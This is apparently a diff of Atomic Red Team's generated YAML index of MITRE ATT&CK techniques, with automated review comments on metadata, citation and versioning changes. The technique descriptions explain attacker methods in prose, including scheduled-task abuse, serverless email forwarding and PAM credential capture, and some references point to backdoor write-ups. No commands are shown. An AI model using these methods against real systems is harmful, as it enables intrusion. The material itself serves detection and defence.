+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
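Review bot: T1204.003 loses `x_mitre_attack_spec_version: 2.1.0` together with `spec_version: '2.1'` and nothing re-adds it, so after this patch it is the only technique in the hunk set with no `x_mitre_attack_spec_version` at all, while it still keeps `x_mitre_permissions_required:` / `- User` that the other objects have dropped. Combined with its `modified` stamp going back to 2021-08-26, this object looks like it came from a different source revision; regenerate it from the same bundle as the rest or restore the spec-version line.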
@@ -31942,9 +32303,10 @@ execution:
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -31952,21 +32314,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
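Review bot: `spec_version: '2.1'` is dropped here (and from every technique object further down) with nothing replacing it; if any loader in this repo treats these objects as STIX 2.1 and reads `spec_version`, it will now hit a missing key, so confirm the generator removed it deliberately and that consumers tolerate its absence. Separately, `x_mitre_version` stays at '1.4' even though this object gains two data sources (`File: File Modification`, `Network Traffic: Network Traffic Flow`) and moves from `x_mitre_attack_spec_version: 2.1.0` to `3.2.0`; that is plausible for a re-serialized upstream object, but it is worth checking against the ATT&CK release the generator is pinned to rather than assuming.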
@@ -32016,7 +32394,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests:
- name: Execute shell script via python's command mode arguement
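Review bot: unrelated to the `spec_version` removal in this hunk, the context line `- name: Execute shell script via python's command mode arguement` carries a typo in the test name (`arguement` should be `argument`). Because test names are reproduced in generated output, fix it at the test's own definition in a separate change rather than hand-editing this generated file.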
@@ -32209,23 +32586,7 @@ execution:
name: sh
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
@@ -32236,32 +32597,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
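Review bot: `x_mitre_permissions_required` (User, Administrator, SYSTEM, root) is removed from T1569 with no replacement, alongside the bump to `x_mitre_version: '1.3'` and `x_mitre_attack_spec_version: 3.2.0`. Anything in the build, docs or index generation that reads that field now needs a default; if nothing does, the rest of this hunk (`type`, `id`, `created`, `external_references` moving to the bottom of the object) is pure key-order churn and could be avoided by having the generator emit keys in a stable order.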
@@ -32304,12 +32677,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests: []
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -32366,11 +32738,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -32435,14 +32806,13 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests: []
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -32463,14 +32833,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
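Review bot: the rewritten T1648 description introduces two new citation keys, `Cloud Hack Tricks GWS Apps Script` and `OWN-CERT Google App Script 2024`, which must match an `external_references.source_name` character for character or the citation is left dangling. Both are added in the references hunk later in this diff with exactly those names, so this resolves, but it is the kind of pairing that breaks silently if either side is edited alone. The same rewrite moves `x_mitre_attack_spec_version: 3.2.0` up next to `kill_chain_phases`; that is consistent with its removal from the bottom of the object further down.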
@@ -32479,16 +32854,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
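Review bot: the platform string changes from `Office 365` to `Office Suite` (with `x_mitre_version` going from '1.0' to '1.1' and OWN added as a contributor); any filter, index or query that selects techniques by the literal platform name `Office 365` will stop matching T1648 after this lands, so check the per-platform index generation for that string before merging.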
@@ -32514,6 +32891,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -32528,29 +32913,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
@@ -32563,25 +32929,41 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
and [Net](https://attack.mitre.org/software/S0039).
@@ -32631,9 +33013,8 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests:
- name: psexec.py (Impacket)
@@ -32684,10 +33065,10 @@ execution:
name: bash
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
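Review bot: the sentence added to the T1053.002 description (scheduling via the `Win32_ScheduledJob` WMI class without ever running `at`) cites `Malicious Life by Cybereason`, a key that must match a `source_name` exactly; the matching reference is added in a later hunk of this diff, so keep the two in step. From a detection standpoint the addition matters: the WMI path produces no `at` command line, so the `Scheduled Job: Scheduled Job Creation` data source retained in the next hunk is the one that still covers it, and detections keyed only on `Command: Command Execution` for `at` will not.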
@@ -32750,7 +33131,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -32784,8 +33165,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
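Review bot: the URL for `Twitter Leoloobeek Scheduled Task` moves from twitter.com to x.com and the retrieved date to September 12, 2024, while `source_name` is left unchanged; keep it that way, since the description text cites that exact key and renaming it would orphan the citation. The identical update appears again under T1053.005 later in the diff, so the two copies stay consistent.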
@@ -32794,6 +33175,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
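Review bot: the new `Malicious Life by Cybereason` reference URL ends in `#blog-subscribe`, a fragment that points at the page's subscription widget rather than the article body; it adds nothing to the citation and looks like page chrome picked up while copying. Since this file is regenerated from upstream ATT&CK data, the fix belongs upstream rather than here, but it is worth reporting so the fragment does not propagate.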
@@ -32806,7 +33191,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests:
- name: At - Schedule a job
@@ -32857,23 +33241,24 @@ execution:
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
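Review bot: the removed lines drop the entire paragraph on the deprecated `at` utility ("The deprecated [at] utility could also be abused by adversaries ... can not access tasks created with schtasks or the Control Panel") rather than rewording it; given that T1053.002 in this same diff still describes `at`, confirm this matches the upstream description and is not a truncation by the generator. The new text also cites `Stack Overflow` and `Red Canary - Atomic Red Team`, both of which must match `source_name` entries exactly; they are added in later hunks.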
@@ -32920,7 +33305,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -32952,8 +33337,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -32967,6 +33352,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
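Review bot: the new `Red Canary - Atomic Red Team` reference points at `atomics/T1053.005/T1053.005.md` in this very repository on `blob/master`, which makes the citation self-referential (that markdown is itself generated from these YAML files) and unpinned, so a branch rename or file move breaks it. Nothing to change in this generated file, but flag it upstream; a commit-pinned URL would be more stable.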
@@ -32979,16 +33368,19 @@ persistence:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
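Review bot: the `modified` timestamp for T1205.002 moves backwards, from `2022-11-08T14:00:00.188Z` to `2022-10-20T19:56:18.579Z`. The old value shares the `14:00:00.188Z` time-of-day with several other removed timestamps in this diff (`2022-05-11T14:00:00.188Z`, `2023-05-09T14:00:00.188Z`), which reads like a release-wide batch touch that the new source bundle does not carry, so this is probably the generator now reading a different export rather than a regression; confirm the source before merging, because anything that sorts or diffs techniques by `modified` will see these objects as older than before.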
@@ -33051,7 +33443,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
@@ -33116,49 +33507,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -33173,20 +33525,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
